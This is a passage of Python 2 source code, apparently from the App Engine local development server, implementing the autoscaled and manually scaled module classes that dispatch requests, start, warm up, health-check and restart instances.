start_response('%d %s' % (httplib.FOUND, httplib.responses[httplib.FOUND]),
[('Content-Type', content_type),
('Location', correct_url),
('Content-Length', str(len(output)))])
return output
@staticmethod
def _normpath(path):
"""Normalize the path by handling . and .. directory entries.
Normalizes the path. A directory entry of . is just dropped while a
directory entry of .. removes the previous entry. Note that unlike
os.path.normpath, redundant separators remain in place to match prod.
Args:
path: an HTTP path.
Returns:
A normalized HTTP path.
"""
normalized_path_entries = []
for entry in path.split('/'):
if entry == '..':
if normalized_path_entries:
normalized_path_entries.pop()
elif entry != '.':
normalized_path_entries.append(entry)
return '/'.join(normalized_path_entries)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._java_config,
self._cloud_sql_config,
self._vm_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
unused_vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
unused_vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. Ignored by AutoScalingModule as
autoscaling is not yet supported by VM runtimes.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
# VM runtimes does not support
# autoscaling.
None,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
return _THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm' and
health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _add_health_checks(self, inst, wsgi_servr, config):
do_health_check = functools.partial(
self._do_health_check, wsgi_servr, inst)
restart_instance = functools.partial(
self._restart_instance, inst)
health_checker = health_check_service.HealthChecker(
inst, config, do_health_check, restart_instance)
health_checker.start()
def _async_start_instance(self, wsgi_servr, inst):
return _THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
try:
if not inst.start():
return
except:
logging.exception('Internal error while starting instance.')
raise
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except Exception, e: # pylint: disable=broad-except
logging.exception('Internal error while handling start request: %s', e)
def _do_health_check(self, wsgi_servr, inst, start_response,
is_last_successful):
is_last_successful = 'yes' if is_last_successful else 'no'
url = '/_ah/health?%s' % urllib.urlencode(
[('IsLastSuccessful', is_last_successful)])
environ = self.build_request_environ(
'GET', url, [], '', '', wsgi_servr.port,
fake_login=True)
return self._handle_request(
environ,
start_response,
inst=inst,
request_type=instance.NORMAL_REQUEST)
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
return _THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
return _THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
# Just force instances to stop for a faster restart.
for inst in instances_to_stop:
inst.quit(force=True)
start_futures = [
self._async_start_instance(wsgi_servr, inst)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start)]
logging.info('Waiting for instances to restart')
health_check_config = self.module_configuration.vm_health_check
for (inst, wsgi_servr) in zip(instances_to_start, wsgi_servers):
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
_, not_done = futures.wait(start_futures, timeout=_SHUTDOWN_TIMEOUT)
if not_done:
logging.warning('All instances may not have restarted')
else:
logging.info('Instances restarted')
def _restart_instance(self, inst):
"""Restarts the specified instance."""
with self._instances_change_lock:
# Quit the old instance.
inst.quit(force=True)
# Create the new instance.
new_instance = self._instance_factory.new_instance(inst.instance_id)
wsgi_servr = self._wsgi_servers[inst.instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
# Start the new instance.
self._start_instance(wsgi_servr, new_instance)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(new_instance, wsgi_servr, health_check_config)
# Replace it in the module registry.
with self._instances_change_lock:
with self._condition:
self._instances[new_instance.instance_id] = new_instance
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
